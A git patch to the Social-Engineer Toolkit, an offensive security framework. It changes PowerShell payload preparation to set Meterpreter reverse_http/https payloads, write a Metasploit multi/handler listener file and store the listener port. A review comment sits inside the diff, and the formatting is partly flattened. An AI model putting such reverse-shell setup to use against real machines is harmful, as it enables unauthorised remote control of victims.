From c54123b3644d18213e342244b992111a5dae7263 Mon Sep 17 00:00:00 2001
From: trustedsec
Date: Thu, 21 Feb 2013 20:06:52 -0500
Subject: [PATCH] Removed additional prompt within powershell alphanum generator
---
 src/core/setcore.py | 6 +++---
 src/payloads/powershell/prep.py | 8 ++++++++
 src/powershell/powershell.py | 4 ++--
 3 files changed, 13 insertions(+), 5 deletions(-)
diff --git a/src/core/setcore.py b/src/core/setcore.py
index b24f1faa6..6a7fb1e05 100644
--- a/src/core/setcore.py
+++ b/src/core/setcore.py
@@ -223,7 +223,7 @@ def print_error(message):
 print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
 def get_version():
- define_version = '4.4.5'
+ define_version = '4.7'
 return define_version
 class create_menu:
@@ -842,8 +842,8 @@ def show_banner(define_version,graphic):
 print bcolors.BLUE + """
 [---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
 [---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
- [---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
- [---] Codename: '""" + bcolors.YELLOW + """The Goat""" + bcolors.BLUE + """' [---]
+ [---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
+ [---] Codename: '""" + bcolors.YELLOW + """The Werewolf""" + bcolors.BLUE + """' [---]
 [---] Follow us on Twitter: """ + bcolors.PURPLE+ """@trustedsec""" + bcolors.BLUE+""" [---]
 [---] Follow me on Twitter: """ + bcolors.PURPLE+ """@dave_rel1k""" + bcolors.BLUE+""" [---]
 [---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+""" [---]
diff --git a/src/payloads/powershell/prep.py b/src/payloads/powershell/prep.py
index 95c4a53bc..7aacff247 100644
--- a/src/payloads/powershell/prep.py
+++ b/src/payloads/powershell/prep.py
@@ -18,6 +18,7 @@ else:
 powershell_inject_x64 = check_config("POWERSHELL_INJECT_PAYLOAD_X64=")
 powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
+# if we specified a hostname then default to reverse https/http
 if validate_ip(ipaddr) == False:
 powershell_inject_x64 = "windows/meterpreter/reverse_https"
 powershell_inject_x86 = "windows/meterpreter/reverse_http"
@@ -36,16 +37,23 @@ if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepat
 filewrite.write("\nuse exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (powershell_inject_x86, port))
 filewrite.close()
+# check to see if the meta config multi pyinjector is there
 if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
 if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
 fileopen = file("%s/src/program_junk/port.options" % (definepath), "r")
 port = fileopen.read()
+ # if port.options isnt there then prompt
 if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
 port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
 if port == "": port = "443"
+ # write out port.options for later use
+ filewrite = file("%s/src/program_junk/port.options" % (definepath), "w")
+ filewrite.write(port)
+ filewrite.close()
 print_status("Generating x64-based powershell injection code...")
+# define a base variable
 x64 = ""
 x86 = ""
diff --git a/src/powershell/powershell.py b/src/powershell/powershell.py
index 356a1771c..ca9216e23 100644
--- a/src/powershell/powershell.py
+++ b/src/powershell/powershell.py
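Review bot: In src/payloads/powershell/prep.py (second hunk) the value typed at the port prompt is written to `port.options` without any check, and the top of the same hunk shows `port` being substituted into the listener resource file through `set LPORT %s`. As long as that file exists, the read branch in this hunk takes the stored value instead of prompting, so a mistyped or non-numeric entry is carried into later runs. I would validate before persisting, e.g. `if not port.isdigit() or not 0 < int(port) < 65536: port = "443"`, and read it back with `port = fileopen.read().strip()`. Writing through `with open(path, "w") as filewrite:` would also close the handle if the write fails; `fileopen` in the read branch is not closed in the visible lines. The page has lost its indentation, so the nesting of the added lines under the `if not os.path.isfile(...)` prompt branch is inferred.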
@@ -53,10 +53,10 @@ if powershell_menu_choice != "99": if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)): port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) if port == "": port = "443" - + choice = yesno_prompt("0","Do you want to start the listener now [yes/no]: ") if choice == 'NO': - pass #print_status("To create the listener for Metasploit, run msfconsole -r powershell.rc") + pass # if we want to start the listener if choice == 'YES': victim = raw_input(setprompt(["29"], "Select x86 or x64 victim machine [default: x64]"))